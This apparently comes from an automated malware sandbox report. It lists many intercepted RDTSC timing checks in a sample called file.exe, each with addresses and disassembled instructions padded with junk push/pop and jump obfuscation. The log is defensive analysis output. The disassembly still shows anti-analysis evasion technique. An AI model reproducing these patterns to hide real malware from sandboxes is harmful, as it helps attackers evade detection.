    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A3745 second address: 8A374B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A2343 second address: 8A2347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A5434 second address: 8A543A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87514E second address: 875154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 875154 second address: 875160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD45C second address: 8AD460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD460 second address: 8AD495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2CB4F0745Bh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2CB4F07460h 0x00000014 jmp 00007F2CB4F07460h 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD495 second address: 8AD49E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A4E second address: 871A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F07463h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A65 second address: 871A69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A69 second address: 871A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A75 second address: 871A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A79 second address: 871A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2CB4F0745Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871A8D second address: 871ACB instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CB4E5A4DFh 0x00000008 jmp 00007F2CB4E5A4D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007F2CB4E5A4D9h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 871ACB second address: 871AD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE08 second address: 8AFE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F2CB4E5A4C6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE17 second address: 8AFE2C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 ja 00007F2CB4F07474h 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F2CB4F07456h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE2C second address: 8AFE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AFE30 second address: 8AFE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2CB4F0745Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B00FD second address: 8B0103 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0484 second address: 8B048F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1150 second address: 8B1156 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1491 second address: 8B1496 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B15B4 second address: 8B15BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1745 second address: 8B1749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1C20 second address: 8B1C3B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2CB4E5A4CCh 0x00000008 jnc 00007F2CB4E5A4C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F2CB4E5A4C8h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1C3B second address: 8B1C66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07462h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a movzx edi, si 0x0000000d push eax 0x0000000e pushad 0x0000000f jp 00007F2CB4F0745Ch 0x00000015 je 00007F2CB4F07456h 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1ED8 second address: 8B1EFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2CB4E5A4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2CB4E5A4D6h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1EFC second address: 8B1F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2200 second address: 8B2237 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jns 00007F2CB4E5A4C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f sub esi, 4B00334Eh 0x00000015 xchg eax, ebx 0x00000016 push ebx 0x00000017 jmp 00007F2CB4E5A4D9h 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2712 second address: 8B2724 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2CB4F07456h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4219 second address: 8B4220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B39C0 second address: 8B39C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B42B9 second address: 8B42BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4E5A second address: 8B4E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4E60 second address: 8B4E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4C01 second address: 8B4C07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B5991 second address: 8B59EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b mov di, si 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F2CB4E5A4C8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push edx 0x0000002b or edi, dword ptr [ebp+122D36E1h] 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 jng 00007F2CB4E5A4D2h 0x0000003b js 00007F2CB4E5A4CCh 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7980 second address: 8B7985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6C80 second address: 8B6C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7760 second address: 8B7766 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7985 second address: 8B7993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2CB4E5A4CAh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7766 second address: 8B776C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B7993 second address: 8B79F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jp 00007F2CB4E5A4D0h 0x0000000f nop 0x00000010 jmp 00007F2CB4E5A4CFh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F2CB4E5A4C8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov edi, dword ptr [ebp+122D35F9h] 0x00000037 mov esi, dword ptr [ebp+122D35F9h] 0x0000003d push 00000000h 0x0000003f mov si, ax 0x00000042 xchg eax, ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 jp 00007F2CB4E5A4C6h 0x0000004c push eax 0x0000004d pop eax 0x0000004e popad 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B776C second address: 8B7770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B79F9 second address: 8B79FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB0E5 second address: 8BB163 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07465h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D1DE8h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F2CB4F07458h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov bh, A2h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F2CB4F07458h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D365Dh] 0x00000052 push eax 0x00000053 pushad 0x00000054 jp 00007F2CB4F0745Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BB163 second address: 8BB17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F2CB4E5A4D4h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE0B5 second address: 8BE0BA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE0BA second address: 8BE10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F2CB4E5A4C8h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, 3346B884h 0x00000029 push 00000000h 0x0000002b jg 00007F2CB4E5A4CCh 0x00000031 mov ebx, dword ptr [ebp+122D382Dh] 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F2CB4E5A4CDh 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF235 second address: 8BF28C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007F2CB4F07464h 0x00000011 jmp 00007F2CB4F0745Eh 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push eax 0x0000001a call 00007F2CB4F07458h 0x0000001f pop eax 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc eax 0x0000002d push eax 0x0000002e ret 0x0000002f pop eax 0x00000030 ret 0x00000031 mov bx, DE05h 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D304Eh] 0x0000003d push 00000000h 0x0000003f mov bx, 61F2h 0x00000043 xchg eax, esi 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF28C second address: 8BF290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF290 second address: 8BF2A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F2CB4F0745Ch 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC32F second address: 8BC3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edi 0x00000007 jp 00007F2CB4E5A4C8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 nop 0x00000011 sub dword ptr [ebp+12477E83h], edi 0x00000017 jmp 00007F2CB4E5A4D1h 0x0000001c push dword ptr fs:[00000000h] 0x00000023 pushad 0x00000024 mov dword ptr [ebp+122D2642h], ecx 0x0000002a popad 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 jne 00007F2CB4E5A4E6h 0x00000038 mov eax, dword ptr [ebp+122D0165h] 0x0000003e pushad 0x0000003f xor dword ptr [ebp+122D34C0h], esi 0x00000045 jmp 00007F2CB4E5A4D3h 0x0000004a popad 0x0000004b push FFFFFFFFh 0x0000004d push 00000000h 0x0000004f push esi 0x00000050 call 00007F2CB4E5A4C8h 0x00000055 pop esi 0x00000056 mov dword ptr [esp+04h], esi 0x0000005a add dword ptr [esp+04h], 0000001Dh 0x00000062 inc esi 0x00000063 push esi 0x00000064 ret 0x00000065 pop esi 0x00000066 ret 0x00000067 mov edi, edx 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3E4 second address: 8BC3E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3E8 second address: 8BC3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD334 second address: 8BD338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3EE second address: 8BC3F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD338 second address: 8BD33E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BC3F4 second address: 8BC3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD423 second address: 8BD428 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE34C second address: 8BE35E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F2CB4E5A4C6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF3FC second address: 8BF417 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07460h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF417 second address: 8BF41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BF41B second address: 8BF41F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0500 second address: 8C0506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0506 second address: 8C050B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C050B second address: 8C0510 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C0510 second address: 8C0516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2345 second address: 8C23C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4E5A4D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F2CB4E5A4CEh 0x00000010 jnc 00007F2CB4E5A4C8h 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F2CB4E5A4C8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov bh, E8h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007F2CB4E5A4C8h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D1EB6h] 0x00000055 push 00000000h 0x00000057 mov ebx, dword ptr [ebp+122D31CCh] 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edx 0x00000061 pushad 0x00000062 popad 0x00000063 pop edx 0x00000064 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C23C2 second address: 8C23C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C23C8 second address: 8C23CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C168A second address: 8C16AE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2CB4F07458h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d jl 00007F2CB4F07456h 0x00000013 jg 00007F2CB4F07456h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F2CB4F07456h 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C16AE second address: 8C16B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C24CE second address: 8C24E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2CB4F07461h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C603E second address: 8C6042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C805F second address: 8C806A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2CB4F07456h 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C806A second address: 8C8070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8070 second address: 8C8080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8080 second address: 8C8085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C8085 second address: 8C808C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C52C9 second address: 8C52CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C53B1 second address: 8C53B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
